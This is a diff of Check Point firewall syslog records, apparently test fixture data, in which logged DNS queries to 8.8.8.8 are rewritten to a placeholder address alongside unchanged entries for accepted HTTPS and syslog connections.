-<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45936"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39569"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47638"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37726"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40113"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45936"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39569"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47638"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38618"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52586"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44899"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44899"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db78,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db79,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503097"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37283"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41500"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37168"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58116"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50860"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50628"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db79,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503097"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37283"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41500"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37168"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58116"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50860"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503098"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50628"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58738"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60912"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db7a,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37994"; service:"443"; service_id:"https"; src:"192.168.2.2"]
